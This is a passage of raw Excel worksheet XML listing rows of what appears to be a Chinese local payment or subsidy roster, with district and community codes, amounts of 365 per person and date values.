      <c r="D2573" s="24" t="s">
        <v>6828</v>
      </c>
      <c r="E2573" s="24" t="s">
        <v>3209</v>
      </c>
      <c r="F2573" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2573" s="24">
        <v>1</v>
      </c>
      <c r="H2573" s="25">
        <v>365</v>
      </c>
      <c r="I2573" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2573" s="41">
        <v>45108</v>
      </c>
      <c r="K2573" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2574" customHeight="1" spans="1:11">
      <c r="A2574" s="23" t="s">
        <v>6829</v>
      </c>
      <c r="B2574" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2574" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2574" s="24" t="s">
        <v>6830</v>
      </c>
      <c r="E2574" s="24" t="s">
        <v>3242</v>
      </c>
      <c r="F2574" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2574" s="24">
        <v>1</v>
      </c>
      <c r="H2574" s="25">
        <v>365</v>
      </c>
      <c r="I2574" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2574" s="41">
        <v>45108</v>
      </c>
      <c r="K2574" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2575" customHeight="1" spans="1:11">
      <c r="A2575" s="23" t="s">
        <v>6831</v>
      </c>
      <c r="B2575" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2575" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2575" s="24" t="s">
        <v>6832</v>
      </c>
      <c r="E2575" s="24" t="s">
        <v>3405</v>
      </c>
      <c r="F2575" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2575" s="24">
        <v>1</v>
      </c>
      <c r="H2575" s="25">
        <v>365</v>
      </c>
      <c r="I2575" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2575" s="41">
        <v>45108</v>
      </c>
      <c r="K2575" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2576" customHeight="1" spans="1:11">
      <c r="A2576" s="23" t="s">
        <v>6833</v>
      </c>
      <c r="B2576" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2576" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2576" s="24" t="s">
        <v>6834</v>
      </c>
      <c r="E2576" s="24" t="s">
        <v>6813</v>
      </c>
      <c r="F2576" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2576" s="24">
        <v>1</v>
      </c>
      <c r="H2576" s="25">
        <v>365</v>
      </c>
      <c r="I2576" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2576" s="41">
        <v>45108</v>
      </c>
      <c r="K2576" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2577" customHeight="1" spans="1:11">
      <c r="A2577" s="23" t="s">
        <v>6835</v>
      </c>
      <c r="B2577" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2577" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2577" s="24" t="s">
        <v>6836</v>
      </c>
      <c r="E2577" s="24" t="s">
        <v>6837</v>
      </c>
      <c r="F2577" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2577" s="24">
        <v>1</v>
      </c>
      <c r="H2577" s="25">
        <v>365</v>
      </c>
      <c r="I2577" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2577" s="41">
        <v>45108</v>
      </c>
      <c r="K2577" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2578" customHeight="1" spans="1:11">
      <c r="A2578" s="23" t="s">
        <v>6838</v>
      </c>
      <c r="B2578" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2578" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2578" s="24" t="s">
        <v>6839</v>
      </c>
      <c r="E2578" s="24" t="s">
        <v>3341</v>
      </c>
      <c r="F2578" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2578" s="24">
        <v>1</v>
      </c>
      <c r="H2578" s="25">
        <v>365</v>
      </c>
      <c r="I2578" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2578" s="41">
        <v>45108</v>
      </c>
      <c r="K2578" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2579" customHeight="1" spans="1:11">
      <c r="A2579" s="23" t="s">
        <v>6840</v>
      </c>
      <c r="B2579" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2579" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2579" s="24" t="s">
        <v>6841</v>
      </c>
      <c r="E2579" s="24" t="s">
        <v>6813</v>
      </c>
      <c r="F2579" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2579" s="24">
        <v>1</v>
      </c>
      <c r="H2579" s="25">
        <v>365</v>
      </c>
      <c r="I2579" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2579" s="41">
        <v>45108</v>
      </c>
      <c r="K2579" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2580" customHeight="1" spans="1:11">
      <c r="A2580" s="23" t="s">
        <v>6842</v>
      </c>
      <c r="B2580" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2580" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2580" s="24" t="s">
        <v>6843</v>
      </c>
      <c r="E2580" s="24" t="s">
        <v>3367</v>
      </c>
      <c r="F2580" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2580" s="24">
        <v>1</v>
      </c>
      <c r="H2580" s="25">
        <v>365</v>
      </c>
      <c r="I2580" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2580" s="41">
        <v>45108</v>
      </c>
      <c r="K2580" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2581" customHeight="1" spans="1:11">
      <c r="A2581" s="23" t="s">
        <v>6844</v>
      </c>
      <c r="B2581" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2581" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2581" s="24" t="s">
        <v>6845</v>
      </c>
      <c r="E2581" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F2581" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2581" s="24">
        <v>1</v>
      </c>
      <c r="H2581" s="25">
        <v>365</v>
      </c>
      <c r="I2581" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2581" s="41">
        <v>45108</v>
      </c>
      <c r="K2581" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2582" customHeight="1" spans="1:11">
      <c r="A2582" s="23" t="s">
        <v>6846</v>
      </c>
      <c r="B2582" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2582" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2582" s="24" t="s">
        <v>6847</v>
      </c>
      <c r="E2582" s="24" t="s">
        <v>3212</v>
      </c>
      <c r="F2582" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2582" s="24">
        <v>1</v>
      </c>
      <c r="H2582" s="25">
        <v>365</v>
      </c>
      <c r="I2582" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2582" s="41">
        <v>45108</v>
      </c>
      <c r="K2582" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2583" customHeight="1" spans="1:11">
      <c r="A2583" s="23" t="s">
        <v>6848</v>
      </c>
      <c r="B2583" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2583" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2583" s="24" t="s">
        <v>6849</v>
      </c>
      <c r="E2583" s="24" t="s">
        <v>6850</v>
      </c>
      <c r="F2583" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2583" s="24">
        <v>1</v>
      </c>
      <c r="H2583" s="25">
        <v>365</v>
      </c>
      <c r="I2583" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2583" s="41">
        <v>45108</v>
      </c>
      <c r="K2583" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2584" customHeight="1" spans="1:11">
      <c r="A2584" s="23" t="s">
        <v>6851</v>
      </c>
      <c r="B2584" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2584" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2584" s="24" t="s">
        <v>6852</v>
      </c>
      <c r="E2584" s="24" t="s">
        <v>6853</v>
      </c>
      <c r="F2584" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2584" s="24">
        <v>1</v>
      </c>
      <c r="H2584" s="25">
        <v>365</v>
      </c>
      <c r="I2584" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2584" s="24">
        <v>45261</v>
      </c>
      <c r="K2584" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2585" customHeight="1" spans="1:11">
      <c r="A2585" s="23" t="s">
        <v>6854</v>
      </c>
      <c r="B2585" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2585" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2585" s="24" t="s">
        <v>6855</v>
      </c>
      <c r="E2585" s="24" t="s">
        <v>5061</v>
      </c>
      <c r="F2585" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2585" s="24">
        <v>1</v>
      </c>
      <c r="H2585" s="25">
        <v>365</v>
      </c>
      <c r="I2585" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2585" s="24">
        <v>45261</v>
      </c>
      <c r="K2585" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2586" customHeight="1" spans="1:11">
      <c r="A2586" s="23" t="s">
        <v>6856</v>
      </c>
      <c r="B2586" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2586" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2586" s="24" t="s">
        <v>6858</v>
      </c>
      <c r="E2586" s="24" t="s">
        <v>4578</v>
      </c>
      <c r="F2586" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2586" s="24">
        <v>1</v>
      </c>
      <c r="H2586" s="25">
        <v>365</v>
      </c>
      <c r="I2586" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2586" s="24">
        <v>45261</v>
      </c>
      <c r="K2586" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2587" customHeight="1" spans="1:11">
      <c r="A2587" s="23" t="s">
        <v>6859</v>
      </c>
      <c r="B2587" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2587" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2587" s="24" t="s">
        <v>6860</v>
      </c>
      <c r="E2587" s="24" t="s">
        <v>4183</v>
      </c>
      <c r="F2587" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2587" s="24">
        <v>1</v>
      </c>
      <c r="H2587" s="25">
        <v>365</v>
      </c>
      <c r="I2587" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2587" s="24">
        <v>45261</v>
      </c>
      <c r="K2587" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2588" customHeight="1" spans="1:11">
      <c r="A2588" s="23" t="s">
        <v>6861</v>
      </c>
      <c r="B2588" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2588" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2588" s="24" t="s">
        <v>6862</v>
      </c>
      <c r="E2588" s="24" t="s">
        <v>6863</v>
      </c>
      <c r="F2588" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2588" s="24">
        <v>1</v>
      </c>
      <c r="H2588" s="25">
        <v>365</v>
      </c>
      <c r="I2588" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2588" s="41">
        <v>45108</v>
      </c>
      <c r="K2588" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2589" customHeight="1" spans="1:11">
      <c r="A2589" s="23" t="s">
        <v>6864</v>
      </c>
      <c r="B2589" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2589" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2589" s="24" t="s">
        <v>6865</v>
      </c>
      <c r="E2589" s="24" t="s">
        <v>6866</v>
      </c>
      <c r="F2589" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2589" s="24">
        <v>1</v>
      </c>
      <c r="H2589" s="25">
        <v>365</v>
      </c>
      <c r="I2589" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2589" s="24" t="s">
        <v>6867</v>
      </c>
      <c r="K2589" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2590" customHeight="1" spans="1:11">
      <c r="A2590" s="23" t="s">
        <v>6868</v>
      </c>
      <c r="B2590" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2590" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2590" s="24" t="s">
        <v>6869</v>
      </c>
      <c r="E2590" s="24" t="s">
        <v>4085</v>
      </c>
      <c r="F2590" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2590" s="24">
        <v>1</v>
      </c>
      <c r="H2590" s="25">
        <v>365</v>
      </c>
      <c r="I2590" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2590" s="24" t="s">
        <v>4672</v>
      </c>
      <c r="K2590" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2591" customHeight="1" spans="1:11">
      <c r="A2591" s="23" t="s">
        <v>6870</v>
      </c>
      <c r="B2591" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2591" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2591" s="24" t="s">
        <v>6871</v>
      </c>
      <c r="E2591" s="24" t="s">
        <v>6740</v>
      </c>
      <c r="F2591" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2591" s="24">
        <v>1</v>
      </c>
      <c r="H2591" s="25">
        <v>365</v>
      </c>
      <c r="I2591" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2591" s="24" t="s">
        <v>6867</v>
      </c>
      <c r="K2591" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2592" customHeight="1" spans="1:11">
      <c r="A2592" s="23" t="s">
        <v>6872</v>
      </c>
      <c r="B2592" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2592" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2592" s="24" t="s">
        <v>6873</v>
      </c>
      <c r="E2592" s="24" t="s">
        <v>6874</v>
      </c>
      <c r="F2592" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2592" s="24">
        <v>1</v>
      </c>
      <c r="H2592" s="25">
        <v>365</v>
      </c>
      <c r="I2592" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2592" s="41">
        <v>45566</v>
      </c>
      <c r="K2592" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2593" customHeight="1" spans="1:14">
      <c r="A2593" s="23" t="s">
        <v>6875</v>
      </c>
      <c r="B2593" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2593" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2593" s="24" t="s">
        <v>6876</v>
      </c>
      <c r="E2593" s="24" t="s">
        <v>6877</v>
      </c>
      <c r="F2593" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2593" s="24">
        <v>1</v>
      </c>
      <c r="H2593" s="25">
        <v>365</v>
      </c>
      <c r="I2593" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2593" s="41">
        <v>45536</v>
      </c>
      <c r="K2593" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2594" customHeight="1" spans="1:14">
      <c r="A2594" s="23" t="s">
        <v>6878</v>
      </c>
      <c r="B2594" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2594" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2594" s="24" t="s">
        <v>6879</v>
      </c>
      <c r="E2594" s="24" t="s">
        <v>6740</v>
      </c>
      <c r="F2594" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2594" s="24">
        <v>1</v>
      </c>
      <c r="H2594" s="25">
        <v>365</v>
      </c>
      <c r="I2594" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2594" s="41">
        <v>45597</v>
      </c>
      <c r="K2594" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2595" customHeight="1" spans="1:14">
      <c r="A2595" s="23" t="s">
        <v>6880</v>
      </c>
      <c r="B2595" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2595" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2595" s="24" t="s">
        <v>6881</v>
      </c>
      <c r="E2595" s="24" t="s">
        <v>6882</v>
      </c>
      <c r="F2595" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2595" s="24">
        <v>1</v>
      </c>
      <c r="H2595" s="25">
        <v>365</v>
      </c>
      <c r="I2595" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2595" s="41">
        <v>45627</v>
      </c>
      <c r="K2595" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2596" customHeight="1" spans="1:14">
      <c r="A2596" s="23" t="s">
        <v>6883</v>
      </c>
      <c r="B2596" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2596" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2596" s="24" t="s">
        <v>6884</v>
      </c>
      <c r="E2596" s="24" t="s">
        <v>5184</v>
      </c>
      <c r="F2596" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2596" s="24">
        <v>1</v>
      </c>
      <c r="H2596" s="25">
        <v>365</v>
      </c>
      <c r="I2596" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2596" s="41">
        <v>45658</v>
      </c>
      <c r="K2596" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2597" customHeight="1" spans="1:14">
      <c r="A2597" s="23" t="s">
        <v>6885</v>
      </c>
      <c r="B2597" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2597" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2597" s="24" t="s">
        <v>6886</v>
      </c>
      <c r="E2597" s="24" t="s">
        <v>5184</v>
      </c>
      <c r="F2597" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2597" s="24">
        <v>1</v>
      </c>
      <c r="H2597" s="25">
        <v>365</v>
      </c>
      <c r="I2597" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2597" s="41">
        <v>45658</v>
      </c>
      <c r="K2597" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2598" customHeight="1" spans="1:14">
      <c r="A2598" s="23" t="s">
        <v>6887</v>
      </c>
      <c r="B2598" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2598" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2598" s="24" t="s">
        <v>6888</v>
      </c>
      <c r="E2598" s="24" t="s">
        <v>6889</v>
      </c>
      <c r="F2598" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2598" s="24">
        <v>2</v>
      </c>
      <c r="H2598" s="25">
        <v>325</v>
      </c>
      <c r="I2598" s="24">
        <f t="shared" si="40"/>
        <v>650</v>
      </c>
      <c r="J2598" s="41">
        <v>45658</v>
      </c>
      <c r="K2598" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2599" customHeight="1" spans="1:14">
      <c r="A2599" s="23" t="s">
        <v>6890</v>
      </c>
      <c r="B2599" s="24" t="str">
        <f>B2598</f>
        <v>军工办</v>
      </c>
      <c r="C2599" s="24" t="str">
        <f>C2598</f>
        <v>向东厂社区</v>
      </c>
      <c r="D2599" s="30" t="s">
        <v>6891</v>
      </c>
      <c r="E2599" s="31" t="s">
        <v>6892</v>
      </c>
      <c r="F2599" s="24" t="str">
        <f>F2598</f>
        <v>4113210699</v>
      </c>
      <c r="G2599" s="24"/>
      <c r="H2599" s="24"/>
      <c r="I2599" s="24">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="J2599" s="24"/>
      <c r="K2599" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2600" customHeight="1" spans="1:14">
      <c r="A2600" s="23" t="s">
        <v>6893</v>
      </c>
      <c r="B2600" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2600" s="24" t="s">
        <v>6857</v>
      </c>
      <c r="D2600" s="24" t="s">
        <v>6894</v>
      </c>
      <c r="E2600" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F2600" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2600" s="24">
        <v>1</v>
      </c>
      <c r="H2600" s="25">
        <v>365</v>
      </c>
      <c r="I2600" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2600" s="24" t="s">
        <v>4661</v>
      </c>
      <c r="K2600" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2601" s="4" customFormat="1" customHeight="1" spans="1:14">
      <c r="A2601" s="23" t="s">
        <v>6895</v>
      </c>
      <c r="B2601" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2601" s="99" t="s">
        <v>6710</v>
      </c>
      <c r="D2601" s="107" t="s">
        <v>6896</v>
      </c>
      <c r="E2601" s="110" t="s">
        <v>4738</v>
      </c>
      <c r="F2601" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2601" s="24">
        <v>1</v>
      </c>
      <c r="H2601" s="25">
        <v>365</v>
      </c>
      <c r="I2601" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2601" s="111" t="s">
        <v>3080</v>
      </c>
      <c r="K2601" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2601" s="8"/>
      <c r="M2601" s="8"/>
      <c r="N2601" s="8"/>
    </row>
    <row r="2602" customHeight="1" spans="1:14">
      <c r="A2602" s="23" t="s">
        <v>6897</v>
      </c>
      <c r="B2602" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2602" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2602" s="24" t="s">
        <v>6898</v>
      </c>
      <c r="E2602" s="24" t="s">
        <v>3206</v>
      </c>
      <c r="F2602" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2602" s="24">
        <v>1</v>
      </c>
      <c r="H2602" s="25">
        <v>365</v>
      </c>
      <c r="I2602" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2602" s="24">
        <v>45108</v>
      </c>
      <c r="K2602" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2603" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2603" s="23" t="s">
        <v>6899</v>
      </c>
      <c r="B2603" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2603" s="27" t="s">
        <v>1674</v>
      </c>
      <c r="D2603" s="27" t="s">
        <v>6900</v>
      </c>
      <c r="E2603" s="29" t="s">
        <v>232</v>
      </c>
      <c r="F2603" s="27" t="s">
        <v>289</v>
      </c>
      <c r="G2603" s="28">
        <v>1</v>
      </c>
      <c r="H2603" s="112">
        <v>365</v>
      </c>
      <c r="I2603" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2603" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2603" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2603" s="8"/>
      <c r="M2603" s="8"/>
      <c r="N2603" s="8"/>
    </row>
    <row r="2604" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2604" s="23" t="s">
        <v>6901</v>
      </c>
      <c r="B2604" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2604" s="27" t="s">
        <v>2032</v>
      </c>
      <c r="D2604" s="27" t="s">
        <v>6902</v>
      </c>
      <c r="E2604" s="29" t="s">
        <v>222</v>
      </c>
      <c r="F2604" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G2604" s="28">
        <v>1</v>
      </c>
      <c r="H2604" s="112">
        <v>365</v>
      </c>
      <c r="I2604" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2604" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2604" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2604" s="8"/>
      <c r="M2604" s="8"/>
      <c r="N2604" s="8"/>
    </row>
    <row r="2605" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2605" s="23" t="s">
        <v>6903</v>
      </c>
      <c r="B2605" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2605" s="99" t="s">
        <v>6904</v>
      </c>
      <c r="D2605" s="99" t="s">
        <v>6905</v>
      </c>
      <c r="E2605" s="99" t="s">
        <v>540</v>
      </c>
      <c r="F2605" s="27" t="s">
        <v>266</v>
      </c>
      <c r="G2605" s="28">
        <v>1</v>
      </c>
      <c r="H2605" s="112">
        <v>365</v>
      </c>
      <c r="I2605" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2605" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2605" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2605" s="8"/>
      <c r="M2605" s="8"/>
      <c r="N2605" s="8"/>
    </row>
    <row r="2606" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2606" s="23" t="s">
        <v>6906</v>
      </c>
      <c r="B2606" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2606" s="113" t="s">
        <v>2035</v>
      </c>
      <c r="D2606" s="49" t="s">
        <v>6907</v>
      </c>
      <c r="E2606" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F2606" s="27" t="s">
        <v>223</v>
      </c>
      <c r="G2606" s="33">
        <v>1</v>
      </c>
      <c r="H2606" s="114">
        <v>365</v>
      </c>
      <c r="I2606" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2606" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2606" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2606" s="8"/>
      <c r="M2606" s="8"/>
      <c r="N2606" s="8"/>
    </row>
    <row r="2607" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2607" s="23" t="s">
        <v>6908</v>
      </c>
      <c r="B2607" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2607" s="27" t="s">
        <v>2304</v>
      </c>
      <c r="D2607" s="29" t="s">
        <v>6909</v>
      </c>
      <c r="E2607" s="29" t="s">
        <v>543</v>
      </c>
      <c r="F2607" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G2607" s="33">
        <v>2</v>
      </c>
      <c r="H2607" s="114">
        <v>325</v>
      </c>
      <c r="I2607" s="24">
        <f t="shared" si="40"/>
        <v>650</v>
      </c>
      <c r="J2607" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2607" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2607" s="8"/>
      <c r="M2607" s="8"/>
      <c r="N2607" s="8"/>
    </row>
    <row r="2608" s="10" customFormat="1" ht="26" customHeight="1" spans="1:14">
      <c r="A2608" s="23" t="s">
        <v>6910</v>
      </c>
      <c r="B2608" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2608" s="27" t="s">
        <v>2304</v>
      </c>
      <c r="D2608" s="29" t="s">
        <v>6911</v>
      </c>
      <c r="E2608" s="29" t="s">
        <v>6912</v>
      </c>
      <c r="F2608" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G2608" s="33"/>
      <c r="H2608" s="33"/>
      <c r="I2608" s="24">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="J2608" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2608" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2608" s="8"/>
      <c r="M2608" s="8"/>
      <c r="N2608" s="8"/>
    </row>
    <row r="2609" s="10" customFormat="1" ht="26" customHeight="1" spans="1:1024 1025:16377">
      <c r="A2609" s="23" t="s">
        <v>6913</v>
      </c>
      <c r="B2609" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C2609" s="27" t="s">
        <v>1674</v>
      </c>
      <c r="D2609" s="33" t="s">
        <v>6914</v>
      </c>
      <c r="E2609" s="33" t="s">
        <v>6915</v>
      </c>
      <c r="F2609" s="27" t="s">
        <v>289</v>
      </c>
      <c r="G2609" s="33">
        <v>1</v>
      </c>
      <c r="H2609" s="114">
        <v>365</v>
      </c>
      <c r="I2609" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2609" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K2609" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2609" s="8"/>
      <c r="M2609" s="8"/>
      <c r="N2609" s="8"/>
    </row>
    <row r="2610" s="10" customFormat="1" ht="26" customHeight="1" spans="1:1024 1025:16377">
      <c r="A2610" s="23" t="s">
        <v>6916</v>
      </c>
      <c r="B2610" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2610" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2610" s="23" t="s">
        <v>6917</v>
      </c>
      <c r="E2610" s="13" t="s">
        <v>5355</v>
      </c>
      <c r="F2610" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2610" s="24">
        <v>1</v>
      </c>
      <c r="H2610" s="25">
        <v>365</v>
      </c>
      <c r="I2610" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
